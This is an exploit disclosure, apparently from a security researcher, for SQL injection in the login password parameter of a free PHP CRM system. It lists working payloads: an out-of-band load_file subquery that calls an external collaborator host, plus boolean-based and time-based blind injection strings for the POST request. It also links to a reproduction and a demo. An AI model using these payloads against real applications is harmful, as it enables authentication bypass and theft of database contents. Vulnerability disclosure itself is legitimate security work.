## Titles: SCRMS 2024-10-07 Multiple-SQLi
## Author: nu11secur1ty
## Date: 10/07/2024
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/15895/simple-customer-relationship-management-crm-system-using-php-free-source-coude.html
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
The `password` parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\y21d722ifi475ewrtfdebwxgd7j07qvhy5qshg6.oastify.com\\wui'))+' was submitted in the password parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.
STATUS: HIGH- Vulnerability
[+]Exploits:
- SQLi Multiple:
```mysql
---
Parameter: password (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: username=UzXLwnuT&password=e9W!b5f!T436397265' or '4734'='4734' AND 1346=1346 AND 'gTBZ'='gTBZ&login=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=UzXLwnuT&password=e9W!b5f!T436397265' or '4734'='4734' AND (SELECT 1661 FROM (SELECT(SLEEP(7)))OEMd) AND 'XYvG'='XYvG&login=
---
```
## Reproduce:
[href](https://www.patreon.com/posts/scrms-2024-10-07-113521158)
## Demo PoC:
[href](https://www.nu11secur1ty.com/2024/10/scrms-2024-10-07-multiple-sqli.html)
## Time spent:
01:27:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>